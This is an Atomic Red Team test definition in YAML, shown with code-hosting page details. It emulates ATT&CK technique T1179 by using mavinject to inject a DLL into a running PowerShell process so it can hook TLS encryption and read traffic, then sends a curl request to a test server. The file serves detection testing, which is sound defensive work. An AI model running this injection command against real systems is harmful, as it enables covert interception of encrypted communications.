Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
26 lines
652 B
YAML
26 lines
652 B
YAML
---
|
|
attack_technique: T1179
|
|
display_name: Hooking
|
|
|
|
atomic_tests:
|
|
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
|
|
description: |
|
|
Hooks functions in PowerShell to read TLS Communications
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
file_name:
|
|
description: Dll To Inject
|
|
type: Path
|
|
default: C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll
|
|
server_name:
|
|
description: TLS Server To Test Get Request
|
|
type: Url
|
|
default: https://www.example.com
|
|
executor:
|
|
name: powershell
|
|
elevation_required: true
|
|
command: |
|
|
mavinject $pid /INJECTRUNNING #{file_name}
|
|
curl #{server_name}
|